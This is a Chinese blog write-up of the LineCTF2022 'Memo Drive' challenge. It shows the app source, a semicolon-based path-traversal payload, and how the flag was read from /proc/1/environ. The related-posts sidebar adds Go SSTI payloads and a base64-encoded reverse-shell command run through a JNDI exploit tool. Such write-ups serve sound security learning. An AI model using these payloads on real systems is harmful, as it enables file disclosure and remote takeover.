[LineCTF2022]Memo Drive

最新推荐文章于 2024-05-18 10:43:35 发布
最新推荐文章于 2024-05-18 10:43:35 发布
阅读量178 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41513009/article/details/130640103
版权

首先查看题目源码

import os
import hashlib
import shutil
import datetime
import uvicorn
import logging

from urllib.parse import unquote
from starlette.applications import Starlette
from starlette.responses import HTMLResponse
from starlette.routing import Route, Mount
from starlette.templating import Jinja2Templates
from starlette.staticfiles import StaticFiles

logger = logging.getLogger()
logger.setLevel(logging.DEBUG)

templates = Jinja2Templates(directory='./')
templates.env.autoescape = False

def index(request):
    context = {}
    memoList = []
    
    try:
        clientId = getClientID(request.client.host)
        path = './memo/' + clientId
        
        if os.path.exists(path):
            memoList = os.listdir(path)
        
        context['request'] = request
        context['ip'] = request.client.host
        context['clientId'] = clientId
        context['memoList'] = memoList
        context['count'] = len(memoList)
    
    except:
        pass
    
    return templates.TemplateResponse('/view/index.html', context)

def save(request):
    context = {}
    memoList = []
    
    try:
        context['request'] = request
        context['ip'] = request.client.host
        
        contents = request.query_params['contents']
        path = './memo/' + getClientID(request.client.host) + '/'
        
        if os.path.exists(path) == False:
            os.makedirs(path, exist_ok=True)
        
        memoList = os.listdir(path)
        idx = len(memoList)
        
        if idx >= 3:
            return HTMLResponse('Memo Full')
        elif len(contents) > 100:
            return HTMLResponse('Contents Size Error (MAX:100)')
        
        filename = str(idx) + '_' + datetime.datetime.now().strftime('%Y%m%d%H%M%S')
            
        f = open(path + filename, 'w')
        f.write(contents)
        f.close()
    
    except:
        pass
    
    return HTMLResponse('Save Complete')

def reset(request):
    context = {}
    
    try:
        context['request'] = request
            
        clientId = getClientID(request.client.host)
        path = './memo/' + clientId
            
        if os.path.exists(path) == False:
            return HTMLResponse('Memo Null')
        
        shutil.rmtree(path)
            
    except:
        pass
    
    return HTMLResponse('Reset Complete')

def view(request):
    context = {}

    try:
        context['request'] = request
        clientId = getClientID(request.client.host)

        if '&' in request.url.query or '.' in request.url.query or '.' in unquote(request.query_params[clientId]):
            raise
        
        filename = request.query_params[clientId]
        path = './memo/' + "".join(request.query_params.keys()) + '/' + filename
        
        f = open(path, 'r')
        contents = f.readlines()
        f.close()
        
        context['filename'] = filename
        context['contents'] = contents
    
    except:
        pass
    
    return templates.TemplateResponse('/view/view.html', context)

def getClientID(ip):
    key = ip + '_' + os.getenv('SALT')
    
    return hashlib.md5(key.encode('utf-8')).hexdigest()

routes = [
    Route('/', endpoint=index),
    Route('/view', endpoint=view),
    Route('/reset', endpoint=reset),
    Route('/save', endpoint=save),
    Mount('/static', StaticFiles(directory='./static'), name='static')
]

app = Starlette(debug=False, routes=routes)

if __name__ == "__main__":
    logging.info("Starting Starlette Server")
    uvicorn.run(app, host="0.0.0.0", port=11000)

找到关键代码view(),view可以查看文件。如果能够控制path的值,那就能读取flag。而我们能控制的地方只有 request.query_params.keys()和filename

def view(request):
    context = {}

    try:
        context['request'] = request
        clientId = getClientID(request.client.host)

        if '&' in request.url.query or '.' in request.url.query or '.' in unquote(request.query_params[clientId]):
            raise
        
        filename = request.query_params[clientId]
        path = './memo/' + "".join(request.query_params.keys()) + '/' + filename
        
        f = open(path, 'r')
        contents = f.readlines()
        f.close()
        
        context['filename'] = filename
        context['contents'] = contents
    
    except:
        pass
    
    return templates.TemplateResponse('/view/view.html', context)

这里涉及到CVE-2021-23336:https://github.com/encode/starlette/issues/1325
漏洞的成因是 Starlette 错误地把分号当成参数的分割符,分号后面的字符串将被当成query_params.keys(),因此如果参数设置成view?67eb9cc01b6d566e811945ab5b376ac5=flag;/…/,分号后面的/…/会被当成query_params.keys()拼接到filename之前,最终代码中的path就会变成
./memo//…//flag,从而读取到flag文件
fake_flag
但是这只是一个假的flag,我们需要使用burp爆破目录读取文件,发现在/proc/1/environ中

environ
flag

Silver Bullet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linectf2022 online-library_[LineCTF2022]gotm
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-05 857
linectf2022 online-library_[LineCTF2022]gotm linectf2022 online-library源码,分析一下几个路由和对应的请求处理函数, [LineCTF2022]gotm注册功能:func regist_handler(w http.ResponseWriter, r *http.Request) { uid := r.FormValue("id") upw := r.FormValue("pw") if uid == "" ||
2022 lineCTF WEB复现WriteUp
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-06 659
lineCTF WEB复现WriteUp Gotm, is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很简单了,先注册一个id为{{.}}的用户: is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI, 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很
LineCTF2022Memo Driver
weixin_60581972的博客
09-30 574
在proc/self/cmdline 发现pythonindex.py 最后 也没能读取出来...hh。再之后读取proc/self/environ 发现一个假的flag。之后就想着嗖哈一把嗦,直接bp跑脚本,没想到第一个就是 = =这里发现memo,以为是读取命令执行记录(错误示范...)详细绕过可以去看这个文章,这里只是寻找buu flag。读取无果之后最后只能尝试其他方法了。
LINECTF2022 web之Memo Driver完整题解
qq_38338511的博客
03-18 323
发现flag文件里没有我们需要的flag,以BUU环境的习惯,肯定是又藏在了env环境变量里了。/proc/{pid}/environ 常用来读取环境变量中的SECRET_KEY或FLAG。没绕过request.query和request.queryparam,一个是用。发现还是没有flag,尝试bp爆破PID。(以CTF出题人的习惯)这题重点的地方在于path,会进行读取输出,flag在上一个目录。下载题目源码打开index.py进行分析。
[LineCTF2022]gotm ( golang SSTI + JWT伪造 )
ShenZ的博客
04-15 5269
我们的思路是利用ssti得到secret_key,再伪造jwt即可得到flag。 如果是正常思路我们应该{{.secret_key}}注入得到key字段,但是root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空 我们的payload应该是{{.}},可以得到 Account结构的所有字段 /regist?id={{.}}&pw=123 /auth?id={{.}}&
CommMemo.zip_memo
09-24
How to Make a Memo to communicate with another
memo中查找字符串
12-14
function SearchMemo(Memo: TCustomEdit; const SearchString: string; Options: TFindOptions): Boolean; var Buffer, P: PChar; Size: Word; begin Result := False; if Length(SearchString) = 0 then ...
recv_memo.zip_memo
09-14
Describe: File already exists(DMExplorer.zip), please upload others.back
Memo Writing _memory_memo_
09-30
BEST WINDOWS DEVELOPING MEMORY INSTRCUTIONS OFR DEVELOPERS
suijishu.rar_delphi memo保存_memo
09-14
‘产生随机数’按钮:生成随机数,其结果显示于左边的memo组件里(如果输入有误会弹出相关提示!); 5.‘生成txt’按钮:设置产生的随机数保存为的txt文档路径并保存文件,默认文件名为:“随机数.txt”; 6....
[LineCTF2022]BB
Sk1y的博客
06-18 1502
八进制,RCE,利用环境变量进行注入
buuctf 2022 3.9
m0_57754423的博客
03-10 4770
ciscn_2019_es_1 保护机制: 保护全开 漏洞点: 这里指针未清空,存在uaf漏洞。 利用思路: 首先malloc一个size大于0x408的chunk,这样的话 就可以绕过tcache了。 然后free掉,之后再dump一下,就可以泄露main_arena + 96 的地址了 这样就可以获得 libc的基地址 和 free_hook了 利用tcache 的double free漏洞 修改fd指针 然后malloc 这样就可以写入free_hook为 one_gad
2022 Real World CTF 体验赛 writeup
b1ackc4t的博客
01-23 1744
log4flag 最近风靡全球的log4j2漏洞,加了一个正则过滤 用log4j自带的语法便轻松绕过,然后常规jndi注入攻击,需要一台在公网的vps 在自己vps上使用工具搭建ldap服务 https://github.com/welk1n/JNDI-Injection-Exploit java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54LzE
Real World CTF 2022 两道web题wp
yink12138的博客
02-09 4970
Hack into Skynet 给了源码,先审一下 #!/usr/bin/env python3 import flask import psycopg2 import datetime import hashlib from skynet import Skynet app = flask.Flask(__name__, static_url_path='') skynet = Skynet() def skynet_detect(): req = { 'method
VNCTF2022 web全复现
Pysnow's Blog
04-07 2435
web 文章目录webGameV4.0gocalc0easyJ4va信息收集获取key反序列化newcalc0非预期PoC 1PoC 2预期解InterestingPHP解法一解法二 GameV4.0 前端小游戏题,直接想到查看js源代码 在data.js文件中搜索到了关键词flag,且后面附着着一个base64编码的字符串,解码试试 得到flag,再将其url解码一下就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 go语言的ssti,传入{{.}}指向当前的类,类似于
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
[图解]SysML和EA建模住宅安全系统-05
最新发布
rolt的专栏
05-18 650
作用就是定义属性之间的数学关系
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 360
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 920
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
react memo
08-18
React.memo 是 React 提供的一个高阶组件 (HOC)。它的作用是优化 React 组件的性能,避免不必要的渲染。 当一个组件的 props 没有发生变化时,React.memo 可以阻止组件的重新渲染。它会对组件的 props 进行浅比较,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值